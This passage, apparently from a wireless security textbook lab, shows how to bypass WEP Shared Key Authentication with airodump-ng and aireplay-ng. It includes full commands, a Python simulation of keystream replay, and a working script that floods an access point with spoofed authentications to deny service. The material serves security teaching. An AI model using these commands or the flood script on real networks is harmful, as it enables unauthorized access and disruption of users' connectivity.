Bypassing Shared Authentication is a bit more challenging than the previous exercises, so follow the steps carefully:
1. Start airodump-ng so that it captures the shared authentication exchange between the access point and its clients, using the airodump-ng mon0 -c 11 --bssid <mac> -w keystream command. The -w option, which is new here, requests airodump-ng to store the captured packets in files whose names are prefixed with the word keystream. Incidentally, it is a good idea to store different packet-capture sessions in different files; this allows you to analyze them long after the trace has been collected.

2. Once a legitimate client authenticates to the access point, whether on its own or because you forced it to reconnect, airodump-ng will capture this exchange automatically by sniffing the air. An indication that the capture has succeeded is when the AUTH column reads WEP.

3. The captured keystream is written to a keystream file in the current directory. In my case, the name of the file is keystream-01-00-21-91-D2-8E-25.xor. Note what this file contains: not the WEP key, but the RC4 keystream for the single IV used in the captured exchange, obtained by XORing the challenge text (sent in the clear) with its encrypted form. It is only as long as the challenge plus the ICV, which is exactly enough to answer another authentication challenge.

4. In order to fake a shared authentication, we use the aireplay-ng tool. We run the aireplay-ng -1 0 -e "Wireless Lab" -y keystream-01-00-21-91-D2-8E-25.xor -a <mac> -h AA:AA:AA:AA:AA:AA mon0 command (-1 selects fake authentication; 0 is the re-association delay in seconds). This aireplay-ng command uses the keystream file retrieved in step 3 (-y) and tries to authenticate with the access point with SSID Wireless Lab (-e) and MAC address 00:21:91:D2:8E:25 (-a), using an arbitrary client MAC address AA:AA:AA:AA:AA:AA (-h).

5. Fire up Wireshark and sniff all packets of interest by applying a wlan.addr == AA:AA:AA:AA:AA:AA filter (add wlan.fc.type_subtype == 0x0b to show only authentication frames). We can verify the exchange this way. You should see a four-packet trace on the Wireshark screen, as shown in the following screenshot:

6. The first packet is the authentication request from the aireplay-ng tool to the access point. The second is the access point's challenge text, and in the third the tool returns that challenge encrypted with the recovered keystream. As the aireplay-ng tool used the derived keystream for encryption, the authentication succeeds and the access point sends a success message in the fourth packet.

We were successful in deriving the keystream from a shared authentication exchange, and we used it to fake an authentication to the access point.
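The following simulation is an added example and is not code from the book or from aircrack-ng. It models the four-frame Shared Key Authentication exchange in pure Python (no radio) so that the keystream recovery airodump-ng performs, and the replay aireplay-ng -1 with -y performs, can be followed byte by byte. The WEP key, IVs and challenge bytes are constructed sample values, and 802.11 headers and the .xor file layout are left out; only the cryptographic core of the bypass is shown.

```python
"""Simulation of the Shared Key Authentication bypass carried out above.

Added example, not code from the book or aircrack-ng. Models WEP's RC4 +
CRC-32 ICV and the four SKA frames; keys, IVs and challenges are sample
values generated here, and no 802.11 framing is modelled.
"""
import os
import zlib


def rc4(key, data):
    """Plain RC4; WEP seeds it with IV || key, so the keystream depends on both."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(payload):
    """WEP integrity check value: CRC-32 of the cleartext, little-endian."""
    return zlib.crc32(payload).to_bytes(4, "little")


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key, iv, payload):
    """Frame body = RC4(iv || key) applied to payload || ICV."""
    return rc4(iv + wep_key, payload + icv(payload))


def wep_decrypt(wep_key, iv, body):
    """Return the cleartext payload, or None if the ICV does not verify."""
    plain = rc4(iv + wep_key, body)
    payload, tag = plain[:-4], plain[-4:]
    return payload if icv(payload) == tag else None


class AccessPoint:
    """Holds the WEP key; the attacker never learns it."""

    def __init__(self, wep_key):
        self._key = wep_key

    def challenge(self):
        """Frame 2 of SKA: 128 bytes of cleartext challenge text."""
        return os.urandom(128)

    def verify(self, challenge, iv, body):
        """Frame 3 check: decrypt with the IV the client chose and compare."""
        return wep_decrypt(self._key, iv, body) == challenge


def legit_client_response(wep_key, challenge):
    """Frame 3 from a client that knows the key: fresh IV, encrypted challenge."""
    iv = os.urandom(3)
    return iv, wep_encrypt(wep_key, iv, challenge)


def recover_keystream(challenge, iv, body):
    """What the keystream-*.xor file holds: (challenge || ICV) XOR ciphertext.
    Both halves went over the air, one in frame 2 and one in frame 3."""
    return iv, xor(challenge + icv(challenge), body)


def forged_response(ks_iv, keystream, new_challenge):
    """aireplay-ng -1 with -y: reuse the same IV and keystream on a new challenge.
    WEP never rejects a repeated IV, and the challenge is always 128 bytes."""
    return ks_iv, xor(new_challenge + icv(new_challenge), keystream)


def run_attack(wep_key=None):
    """Observe one legitimate SKA exchange, then authenticate without the key."""
    wep_key = wep_key or os.urandom(13)          # 104-bit key, unknown to the attacker
    ap = AccessPoint(wep_key)

    # 1. Legitimate client authenticates; the attacker sniffs frames 2 and 3.
    c1 = ap.challenge()
    iv, body = legit_client_response(wep_key, c1)
    assert ap.verify(c1, iv, body)
    ks_iv, ks = recover_keystream(c1, iv, body)

    # 2. Attacker asks to authenticate from a spoofed MAC and gets a new challenge.
    c2 = ap.challenge()
    iv2, body2 = forged_response(ks_iv, ks, c2)
    return ap.verify(c2, iv2, body2)               # True: the AP sends "success"


if __name__ == "__main__":
    print("authentication accepted:", run_attack())
```

The point to take from the simulation is that the attacker never recovers the WEP key: the 132 recovered bytes are the RC4 output for one IV, and because WEP lets a client reuse any IV and the challenge length is fixed, that one keystream answers every future challenge from the same access point.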
Access points have a maximum client count after which they start refusing connections. By writing a simple wrapper over aireplay-ng, it is possible to automate sending hundreds of authentication requests from random MAC addresses to the access point. This fills the access point's internal client tables, and once the maximum client count is reached the access point stops accepting new connections. This is a Denial of Service (DoS) attack; on some devices it forces the router to reboot or leaves it dysfunctional, disconnecting all the wireless clients and leaving them unable to use the authorized network. Because this access point uses Shared Key Authentication, every forged request still has to carry a correctly encrypted challenge, so the wrapper must pass the same keystream file to aireplay-ng with -y.
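One way to write that wrapper, as an added example that is not code from the book or from aircrack-ng: it reuses the ESSID, BSSID, keystream file name and monitor interface from the exercise above (assumed values; change them for your own lab) and defaults to a dry run that only prints the aireplay-ng command lines, so nothing is transmitted until --live is given.

```python
"""Wrapper over aireplay-ng for the "fill the access point's client table" exercise.

Added example; not code from the book or aircrack-ng. ESSID, BSSID, keystream
file and interface are the values assumed from the exercise above. Dry-run by
default: the aireplay-ng command lines are printed, not executed.
"""
import argparse
import os
import shlex
import subprocess

ESSID = "Wireless Lab"                             # assumed from the exercise above
BSSID = "00:21:91:D2:8E:25"
KEYSTREAM = "keystream-01-00-21-91-D2-8E-25.xor"
IFACE = "mon0"


def random_client_mac():
    """Random unicast MAC with the locally-administered bit set (first octet xxxxxx10)."""
    octets = bytearray(os.urandom(6))
    octets[0] = (octets[0] & 0xFC) | 0x02
    return ":".join(f"{b:02X}" for b in octets)


def fake_auth_argv(client_mac):
    """The same aireplay-ng -1 invocation used above, with the client MAC swapped in."""
    return ["aireplay-ng", "-1", "0", "-e", ESSID, "-y", KEYSTREAM,
            "-a", BSSID, "-h", client_mac, IFACE]


def flood(count, dry_run=True, timeout=15):
    """Attempt `count` shared-key authentications, each from a fresh random MAC.

    Returns the list of MACs used. With dry_run=True the command lines are
    printed instead of run; otherwise each aireplay-ng run is bounded by
    `timeout` seconds so an access point that stops answering cannot stall
    the loop (which is exactly the condition the exercise is looking for).
    """
    used = []
    for _ in range(count):
        mac = random_client_mac()
        argv = fake_auth_argv(mac)
        if dry_run:
            print(shlex.join(argv))
        else:
            try:
                subprocess.run(argv, check=False, timeout=timeout)
            except subprocess.TimeoutExpired:
                pass  # AP probably no longer answering: keep going
        used.append(mac)
    return used


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description=__doc__.splitlines()[0])
    parser.add_argument("count", type=int, nargs="?", default=100)
    parser.add_argument("--live", action="store_true",
                        help="actually run aireplay-ng (needs root and the monitor interface)")
    args = parser.parse_args()
    macs = flood(args.count, dry_run=not args.live)
    print(f"{len(macs)} authentication attempts from {len(set(macs))} distinct MACs")
```

Run it as `python3 flood.py 200` to review the command lines, then `sudo python3 flood.py 200 --live` in the lab. Watching the airodump-ng station list while it runs shows the spoofed clients appearing; the moment aireplay-ng starts timing out or reporting failures is the moment the access point's table is full.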
Check whether you can verify this in your lab!
Q1. How can you force a wireless client to re-connect to the access point?
Q2. What does Open Authentication do?
Q3. How does breaking Shared Key Authentication work?